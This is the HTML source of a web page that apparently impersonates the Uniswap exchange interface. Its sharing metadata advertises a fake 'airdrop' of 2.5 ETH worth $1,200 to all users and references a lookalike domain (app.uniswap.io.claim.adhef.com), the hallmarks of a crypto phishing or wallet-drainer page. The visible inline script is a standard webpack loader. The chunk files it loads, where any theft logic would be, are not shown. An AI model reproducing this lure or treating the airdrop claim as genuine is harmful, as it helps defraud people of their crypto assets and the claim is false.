<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <link rel="shortcut icon" type="image/png" href="favicon.png" />
        <link rel="apple-touch-icon" sizes="192x192" href="images/192x192_App_Icon.png" />
        <link rel="apple-touch-icon" sizes="512x512" href="images/512x512_App_Icon.png" />
		<meta property="og:title" content="Ethereum: Uniswap airdrops 2.5 ETH to all users worth $1,200">
        <meta property="og:locale" content="en">
        <meta property="og:image" content="https://app.uniswap.io.claim.adhef.com/images/192x192_App_Icon.png">
        <meta name="description" content="Decentralized exchange protocol Uniswap has launched its governance token UNI which is airdropped to all users. ">
        <meta property="og:description" content="Decentralized exchange protocol Uniswap has launched its governance token UNI which is airdropped to all users. ">
        <meta property="og:type" content="website">
        <meta name="viewport" content="width=device-width,initial-scale=1" />
        <meta name="theme-color" content="#ff007a" />
        <link rel="manifest" href="manifest.json" />
        <title>Uniswap Interface</title>
        <link href="static/css/4.f04942fe.chunk.css" rel="stylesheet" />
    </head>
    <body>
        <noscript>You need to enable JavaScript to run this app.</noscript>
        <div id="root"></div>
        <script>
            !(function (e) {
                function r(r) {
                    for (var n, a, i = r[0], c = r[1], f = r[2], s = 0, p = []; s < i.length; s++) (a = i[s]), Object.prototype.hasOwnProperty.call(o, a) && o[a] && p.push(o[a][0]), (o[a] = 0);
                    for (n in c) Object.prototype.hasOwnProperty.call(c, n) && (e[n] = c[n]);
                    for (l && l(r); p.length; ) p.shift()();
                    return u.push.apply(u, f || []), t();
                }
                function t() {
                    for (var e, r = 0; r < u.length; r++) {
                        for (var t = u[r], n = !0, i = 1; i < t.length; i++) {
                            var c = t[i];
                            0 !== o[c] && (n = !1);
                        }
                        n && (u.splice(r--, 1), (e = a((a.s = t[0]))));
                    }
                    return e;
                }
                var n = {},
                    o = { 3: 0 },
                    u = [];
                function a(r) {
                    if (n[r]) return n[r].exports;
                    var t = (n[r] = { i: r, l: !1, exports: {} });
                    return e[r].call(t.exports, t, t.exports, a), (t.l = !0), t.exports;
                }
                (a.e = function (e) {
                    var r = [],
                        t = o[e];
                    if (0 !== t)
                        if (t) r.push(t[2]);
                        else {
                            var n = new Promise(function (r, n) {
                                t = o[e] = [r, n];
                            });
                            r.push((t[2] = n));
                            var u,
                                i = document.createElement("script");
                            (i.charset = "utf-8"),
                                (i.timeout = 120),
                                a.nc && i.setAttribute("nonce", a.nc),
                                (i.src = (function (e) {
                                    return a.p + "static/js/" + ({}[e] || e) + "." + { 0: "454e5a78", 1: "ab9e1769", 5: "59a5c2ca", 6: "9bd13394", 7: "be8c5419", 8: "9b1dfb7e", 9: "89ec9192" }[e] + ".chunk.js";
                                })(e));
                            var c = new Error();
                            u = function (r) {
                                (i.onerror = i.onload = null), clearTimeout(f);
                                var t = o[e];
                                if (0 !== t) {
                                    if (t) {
                                        var n = r && ("load" === r.type ? "missing" : r.type),
                                            u = r && r.target && r.target.src;
                                        (c.message = "Loading chunk " + e + " failed.\n(" + n + ": " + u + ")"), (c.name = "ChunkLoadError"), (c.type = n), (c.request = u), t[1](c);
                                    }
                                    o[e] = void 0;
                                }
                            };
                            var f = setTimeout(function () {
                                u({ type: "timeout", target: i });
                            }, 12e4);
                            (i.onerror = i.onload = u), document.head.appendChild(i);
                        }
                    return Promise.all(r);
                }),
                    (a.m = e),
                    (a.c = n),
                    (a.d = function (e, r, t) {
                        a.o(e, r) || Object.defineProperty(e, r, { enumerable: !0, get: t });
                    }),
                    (a.r = function (e) {
                        "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, { value: "Module" }), Object.defineProperty(e, "__esModule", { value: !0 });
                    }),
                    (a.t = function (e, r) {
                        if ((1 & r && (e = a(e)), 8 & r)) return e;
                        if (4 & r && "object" == typeof e && e && e.__esModule) return e;
                        var t = Object.create(null);
                        if ((a.r(t), Object.defineProperty(t, "default", { enumerable: !0, value: e }), 2 & r && "string" != typeof e))
                            for (var n in e)
                                a.d(
                                    t,
                                    n,
                                    function (r) {
                                        return e[r];
                                    }.bind(null, n)
                                );
                        return t;
                    }),
                    (a.n = function (e) {
                        var r =
                            e && e.__esModule
                                ? function () {
                                      return e.default;
                                  }
                                : function () {
                                      return e;
                                  };
                        return a.d(r, "a", r), r;
                    }),
                    (a.o = function (e, r) {
                        return Object.prototype.hasOwnProperty.call(e, r);
                    }),
                    (a.p = "index.html"),
                    (a.oe = function (e) {
                        throw (console.error(e), e);
                    });
                var i = (this["webpackJsonp@uniswap/interface"] = this["webpackJsonp@uniswap/interface"] || []),
                    c = i.push.bind(i);
                (i.push = r), (i = i.slice());
                for (var f = 0; f < i.length; f++) r(i[f]);
                var l = c;
                t();
            })([]);
        </script>
        <script src="static/js/4.954d562a.chunk.js"></script>
        <script src="static/js/main.7a738221.chunk.js"></script>
    </body>
</html>
